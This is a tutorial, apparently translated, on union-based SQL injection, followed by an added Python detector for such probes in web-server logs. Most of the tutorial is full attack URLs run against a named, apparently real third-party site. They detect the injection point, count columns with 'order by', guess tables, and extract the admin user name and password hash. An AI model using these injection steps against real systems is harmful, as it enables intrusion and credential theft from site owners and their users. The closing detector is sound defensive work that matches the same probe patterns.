After learning how to determine the injection point, we need to learn the statements that can actually obtain sensitive information. In this chapter we learn the simplest of them: the union query statement.
Glossary:
Union query: the queries of two tables are combined by an operation equivalent to appending one table to the other.
When injecting a website, we must first determine whether there is an injection point, so let's do that first.
To keep the display concise and clear, I will write + in place of spaces, because once the URL is submitted a space is converted to %20 anyway.
Use and 1=1 and and 1=2 to check whether there is an injection point:
http://www.lanxum.com/special.asp?id=198+and+1=1 returns normally
http://www.lanxum.com/special.asp?id=198+and+1=2 returns an error
This indicates that there is an injection point.
The order by statement is used to find out how many data tables there are in the database.
For example, if the database has 10 tables, order by 10 returns a normal result. If we ask whether there are 11 tables, there obviously is no 11th table, so of course an error is returned.
On this site I found 19 data tables in the database:
order by 19 returns normally
order by 20 returns an error
This confirms that there are 19 tables in the database. Next we need to query for sensitive table names; for example, the administrator table is usually named admin or user, and that is what we gather at this point.
The statement used to check whether a table exists is and 1=2 union select 1,2,3,4,5,6,7,8,9 from <table name>. Of course, this is for the case where the parameter is a number.
If the parameter is of character type, it should be changed to: and 1=2 union select 1,2,3,4,5,6,7,8,9 from <table name>
union means combine; select means query. You can translate the English words directly, which makes them easy to understand.
Here we enter: http://www.lanxum.com/special.asp?id=198+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+admin
Return value:
Numbers appear in some places on the returned page, which indicates that the admin table exists. These numbers correspond to the positions in the select statement in the address bar.
If the table we query does not exist, an error page is returned.
I want to check the user table: http://www.lanxum.com/special.asp?id=198+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user
Return value:
An error is returned, indicating that the user table does not exist.
Next we guess the contents of the fields in the chosen table. Enter the field name we want to guess in place of one of the numbers that appear on the returned page.
Here I guess the name field in the admin table:
http://www.lanxum.com/special.asp?id=198+and+1=2+union+select+1,name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+admin
Replacing "2" with "name" returns the user name, indicating that the name field exists. The user name obtained is only the content of the first record. Next we query the pass field:
http://www.lanxum.com/special.asp?id=198+and+1=2+union+select+1,name,3,4,5,6,pass,8,9,10,11,12,13,14,15,16,17,18,19+from+admin
A 16-character MD5 password hash is returned. Of course, I had already tested the table and field names on this site, which is why I could guess them; if the administrator has changed the table and field names to something complex, we may not be able to guess them.
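As an added example (not part of the original article), here is a small Python detector a defender could run over web-server access logs to spot the probe sequence this walk-through uses: the and 1=1 / and 1=2 pair, the incrementing order by, and the union select ... from table guesses. The log lines, client addresses and paths are constructed placeholders, not records from the site discussed above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines: client, method, request target, status.
# Client addresses and paths are placeholders, not the site discussed above.
SAMPLE_LOG = """\
203.0.113.5 GET /special.asp?id=198 200
203.0.113.5 GET /special.asp?id=198+and+1=1 200
203.0.113.5 GET /special.asp?id=198+and+1=2 500
203.0.113.5 GET /special.asp?id=198+order+by+19 200
203.0.113.5 GET /special.asp?id=198+order+by+20 500
203.0.113.5 GET /special.asp?id=198+and+1=2+union+select+1,2,3,4,5,6,7,8,9+from+user 500
203.0.113.5 GET /special.asp?id=198+and+1=2+union+select+1,name,3,4,5,6,pass,8,9+from+admin 200
198.51.100.7 GET /news.asp?id=17%20and%201%3D1 200
"""

# The three probe shapes from the walk-through, matched on the URL-decoded value
# ('+' and '%20' both decode to a space, so the encoding makes no difference).
PROBES = {
    "boolean": re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),
    "orderby": re.compile(r"\border\s+by\s+\d+", re.I),
    "union": re.compile(r"\bunion\s+(?:all\s+)?select\b.*?\bfrom\s+\w+", re.I),
}

def classify_value(value):
    """Return the probe types whose pattern matches one decoded parameter value."""
    return [name for name, rx in PROBES.items() if rx.search(value)]

def scan_log(text):
    """Group hits by client as (line_no, param, probe_types, status)."""
    hits = {}
    for n, line in enumerate(text.splitlines(), 1):
        client, _method, target, status = line.split()
        for param, values in parse_qs(urlsplit(target).query).items():
            for value in values:
                if probes := classify_value(value):
                    hits.setdefault(client, []).append((n, param, probes, int(status)))
    return hits

def assess(hits):
    """Per client: UNION SELECT ... FROM seen -> 'union_enumeration'; an and-N=N probe
    answered with both a 2xx and a non-2xx status -> 'boolean_oracle'; else 'probe_only'."""
    verdicts = {}
    for client, rows in hits.items():
        kinds = {k for _, _, probes, _ in rows for k in probes}
        bool_ok = {200 <= st < 300 for _, _, probes, st in rows if "boolean" in probes}
        verdicts[client] = ("union_enumeration" if "union" in kinds
                            else "boolean_oracle" if bool_ok == {True, False}
                            else "probe_only")
    return verdicts
```

Running assess(scan_log(SAMPLE_LOG)) rates the first client as union_enumeration and the second, which only sent a single and 1=1 with no differing error response, as probe_only.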
All right, that's it for union queries.